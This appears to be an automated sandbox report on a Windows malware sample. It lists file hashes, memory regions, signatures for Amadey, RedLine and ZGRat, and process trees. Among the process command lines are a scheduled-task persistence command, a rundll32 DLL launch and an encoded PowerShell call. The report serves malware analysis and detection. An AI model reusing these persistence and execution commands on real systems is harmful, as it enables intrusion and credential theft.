SHA512 4fa7c75230a7f5a8b760534a28cc74f7beff2fc302c9ac70e6de9544e4d892e09387351ace4d523c4f0e18c2bdff5fffc0f15bf680cad88dc54a65b3a978167e

\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 2ac9bea08704210b2537fcbd3f244496
SHA1 8ee3e4f4b2a582c97b80a3f5a0e2344c43d6bfa3
SHA256 c3c3ac7c56ca6e9387dbf41b1a3e3708ece828b6260a30f8a5d67d4ae27763fd
SHA512 7db3f1988b0384046a837c9df0917be5810b1596477643eaa2fa40fd2e21a52756a1d58616b8445d1c08aada48bf5ba972bfa3f6dba392f448f9678bab441682

memory/1728-223-0x0000000001120000-0x0000000001603000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

MD5 24ca7dbb6f0cc43aa650807593091ff2
SHA1 db0e37151a82120c3519f3b587b8ad452e96fc75
SHA256 216f5cd816b0bbc83a27d4d9198994a85eca951e571983e82e3d9fa51a1aac8f
SHA512 2b13d8e66979ede339338f786db9d8788ac4aac3d383ed2e491c51418022c6342484d659cdc4fd55f3b03141286cfc245187a978ef5fdf9c9d015dbd1dea9d86

memory/2552-233-0x00000000737B0000-0x0000000073E9E000-memory.dmp

memory/1728-234-0x0000000001120000-0x0000000001603000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

MD5 49de8961e3d7dcbc6a0bc6d5800c17dd
SHA1 7b5b96d1217b8a6fc1587a8920ea587d86a804c3
SHA256 bf26a770ef4fdd475d4789eb9e9572c6b3dba2d81159f4e2e15bdd4bc11b3b95
SHA512 bbee597d3940403a51ad4defdd9e8b56cb575d44d7513a630ad82def0a401a4eeade58d93e7d2819d7e6c0d55a430916ab0a9cf9bb6f69d0b510a84ddab2b118

C:\Users\Admin\AppData\Local\Temp\main\extracted\xfAk7rC2FeEN35Y8o.exe

MD5 54ce50e8d50599046a20a47555dfb5eb
SHA1 96a891edc54ba1f6d66fbdde47c884e535c83ebe
SHA256 3662c80499b08fe24e982ab558897cfca2cd5e7198b1519bc4490a8551b486ac
SHA512 e787782b960dd3d36972616c42be13e66ad15c3ae6c3e3c8c8f04c5667529568a8c7ecceca8a2971fc71b039aea63cb6ebfb49c3263d82a9fb2f654ccb133892

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

MD5 22a25a629e495aed50731591b05c997a
SHA1 cb93590710e0b2b142fe252f775015237dad10da
SHA256 16a82ffd653bacaa05e181ec61b0900077955187288908e75c332d3fb54a368d
SHA512 64d71421cf124e3b4c66020e8ab7a6760625ec40cbb2e960e87d5ad5683cdd09f37bd26353dd98a5a5068ae712c0b6a05a5deff08dea1d4a4cb7da837c6376d2

memory/2156-235-0x0000000002770000-0x0000000004770000-memory.dmp

memory/1808-236-0x0000000002030000-0x000000000212E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe

MD5 f4ec0a6240099958d490c053e0a1b6d4
SHA1 b00d1d9ec4991c6156d508504276f7fb6428096a
SHA256 99b156a2926cc2dd2be7df741563a66aef1af075f835cb2b42835eba792f2f70
SHA512 60193ad4993cb45a8f859336d38c1af29e9528cd65350c804e856846fcb74276f3e44f470ada4ebe353eeba8f6c6e644c3d500ad695f6951a25516c190189bd4

memory/2784-250-0x0000000004610000-0x000000000504D000-memory.dmp

memory/2784-251-0x00000000001D0000-0x00000000005D8000-memory.dmp

memory/2784-252-0x0000000004610000-0x000000000504D000-memory.dmp

memory/2552-253-0x0000000004830000-0x0000000004870000-memory.dmp

memory/2140-254-0x00000000737B0000-0x0000000073E9E000-memory.dmp

memory/2984-255-0x000000013FCD0000-0x000000014070D000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 85af6c99d918757171d2d280e5ac61ef
SHA1 ba1426d0ecf89825f690adad0a9f3c8c528ed48e
SHA256 150fb1285c252e2b79dea84efb28722cc22d370328ceb46fb9553de1479e001e
SHA512 12c061d8ff87cdd3b1f26b84748396e4f56fc1429152e418988e042bc5362df96a2f2c17bcf826d17a8bae9045ee3ba0c063fb565d75c604e47009ff442e8c8e

memory/2216-269-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2216-268-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2216-267-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2216-270-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2552-273-0x0000000004830000-0x0000000004870000-memory.dmp

memory/2216-272-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2984-266-0x000000013FCD0000-0x000000014070D000-memory.dmp

memory/2216-275-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2216-280-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2216-278-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2980-281-0x000000013FF70000-0x00000001409AD000-memory.dmp

memory/2492-282-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2492-283-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2492-284-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2156-286-0x00000000737B0000-0x0000000073E9E000-memory.dmp

memory/2492-285-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2492-287-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2484-291-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2484-292-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2492-290-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2484-293-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2484-296-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2484-295-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2484-294-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2484-297-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2484-299-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2484-298-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2484-302-0x0000000140000000-0x0000000140840000-memory.dmp

memory/2484-303-0x00000000001B0000-0x00000000001D0000-memory.dmp

memory/2980-301-0x000000013FF70000-0x00000001409AD000-memory.dmp

memory/2784-304-0x00000000001D0000-0x00000000005D8000-memory.dmp

memory/1728-305-0x0000000001120000-0x0000000001603000-memory.dmp

memory/1808-306-0x0000000002030000-0x0000000002128000-memory.dmp

memory/2140-308-0x00000000048C0000-0x0000000004900000-memory.dmp

memory/1808-307-0x0000000002030000-0x0000000002128000-memory.dmp

memory/1728-310-0x0000000001120000-0x0000000001603000-memory.dmp

memory/1808-311-0x0000000002030000-0x0000000002128000-memory.dmp

memory/2140-313-0x00000000048C0000-0x0000000004900000-memory.dmp

memory/1808-314-0x0000000002030000-0x0000000002128000-memory.dmp

memory/2484-316-0x0000000140000000-0x0000000140840000-memory.dmp

memory/1808-317-0x0000000002030000-0x0000000002128000-memory.dmp

memory/1992-318-0x00000000001D0000-0x00000000005D8000-memory.dmp

memory/1808-332-0x0000000002030000-0x0000000002128000-memory.dmp

memory/1808-330-0x0000000002030000-0x0000000002128000-memory.dmp

memory/1808-328-0x0000000002030000-0x0000000002128000-memory.dmp

memory/1808-326-0x0000000002030000-0x0000000002128000-memory.dmp

memory/1808-324-0x0000000002030000-0x0000000002128000-memory.dmp

memory/1808-321-0x0000000002030000-0x0000000002128000-memory.dmp

memory/2484-319-0x0000000140000000-0x0000000140840000-memory.dmp

memory/1808-477-0x00000000737B0000-0x0000000073E9E000-memory.dmp

memory/1808-573-0x00000000005E0000-0x0000000000620000-memory.dmp

memory/2140-574-0x00000000048C0000-0x0000000004900000-memory.dmp

memory/2552-575-0x0000000004830000-0x0000000004870000-memory.dmp

memory/2484-577-0x0000000000250000-0x0000000000270000-memory.dmp

memory/2384-582-0x00000000013D0000-0x00000000013D8000-memory.dmp

memory/2384-600-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp

memory/1868-614-0x0000000000250000-0x0000000000350000-memory.dmp

memory/1784-621-0x0000000000400000-0x000000000040C000-memory.dmp

memory/2784-620-0x0000000004610000-0x000000000504D000-memory.dmp

memory/2784-622-0x0000000004610000-0x000000000504D000-memory.dmp

memory/1784-623-0x00000000737B0000-0x0000000073E9E000-memory.dmp

memory/1784-624-0x0000000004EC0000-0x0000000004F00000-memory.dmp

memory/1992-626-0x00000000001D0000-0x00000000005D8000-memory.dmp

memory/1784-627-0x00000000737B0000-0x0000000073E9E000-memory.dmp

memory/2568-637-0x00000000001D0000-0x00000000005D8000-memory.dmp

memory/2484-639-0x0000000000250000-0x0000000000270000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-24 04:15

Reported

2024-01-24 04:17

Platform

win10v2004-20231222-en

Max time kernel

24s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe"

Signatures

Amadey

trojan amadey

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Creates new service(s)

persistence

Downloads MZ/PE file

Modifies Windows Firewall

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2092 set thread context of 1956 N/A C:\Windows\System32\Conhost.exe C:\Windows\SysWOW64\WerFault.exe
PID 4748 set thread context of 2224 N/A C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe C:\Windows\SysWOW64\WerFault.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\nsfA097.tmp
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\SysWOW64\WerFault.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\SysWOW64\WerFault.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\SysWOW64\WerFault.exe N/A

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Delays execution with timeout.exe

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4376 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
PID 4376 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
PID 4376 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
PID 4888 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\SysWOW64\schtasks.exe
PID 4888 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\SysWOW64\schtasks.exe
PID 4888 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\SysWOW64\schtasks.exe
PID 4888 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
PID 4888 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
PID 4888 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
PID 4888 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\System32\Conhost.exe
PID 4888 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\System32\Conhost.exe
PID 4888 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\System32\Conhost.exe
PID 2092 wrote to memory of 1956 N/A C:\Windows\System32\Conhost.exe C:\Windows\SysWOW64\WerFault.exe
PID 2092 wrote to memory of 1956 N/A C:\Windows\System32\Conhost.exe C:\Windows\SysWOW64\WerFault.exe
PID 2092 wrote to memory of 1956 N/A C:\Windows\System32\Conhost.exe C:\Windows\SysWOW64\WerFault.exe
PID 2092 wrote to memory of 1956 N/A C:\Windows\System32\Conhost.exe C:\Windows\SysWOW64\WerFault.exe
PID 2092 wrote to memory of 1956 N/A C:\Windows\System32\Conhost.exe C:\Windows\SysWOW64\WerFault.exe
PID 2092 wrote to memory of 1956 N/A C:\Windows\System32\Conhost.exe C:\Windows\SysWOW64\WerFault.exe
PID 2092 wrote to memory of 1956 N/A C:\Windows\System32\Conhost.exe C:\Windows\SysWOW64\WerFault.exe
PID 2092 wrote to memory of 1956 N/A C:\Windows\System32\Conhost.exe C:\Windows\SysWOW64\WerFault.exe
PID 4888 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe
PID 4888 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe
PID 4888 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe
PID 4748 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe C:\Windows\SysWOW64\WerFault.exe
PID 4888 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
PID 2772 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2480 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe
PID 4888 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000552001\store.exe
PID 4888 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\SysWOW64\rundll32.exe
PID 4888 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\SysWOW64\WerFault.exe
PID 2876 wrote to memory of 4696 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe
PID 2876 wrote to memory of 4880 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe
PID 4696 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 2876 wrote to memory of 876 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
PID 2876 wrote to memory of 4920 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\rty25.exe
PID 2876 wrote to memory of 2968 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\FirstZ.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe

"C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe"

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

"C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe

"C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe"

C:\Users\Admin\AppData\Local\Temp\1000545001\gold1234.exe

"C:\Users\Admin\AppData\Local\Temp\1000545001\gold1234.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe

"C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000548001\flesh.exe

"C:\Users\Admin\AppData\Local\Temp\1000548001\flesh.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe

"C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe"

C:\Users\Admin\AppData\Local\Temp\1000552001\store.exe

"C:\Users\Admin\AppData\Local\Temp\1000552001\store.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\1000556001\latestrocki.exe

"C:\Users\Admin\AppData\Local\Temp\1000556001\latestrocki.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\rty25.exe

"C:\Users\Admin\AppData\Local\Temp\rty25.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 352

C:\Users\Admin\AppData\Local\Temp\FirstZ.exe

"C:\Users\Admin\AppData\Local\Temp\FirstZ.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 664

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 716

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 716

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876

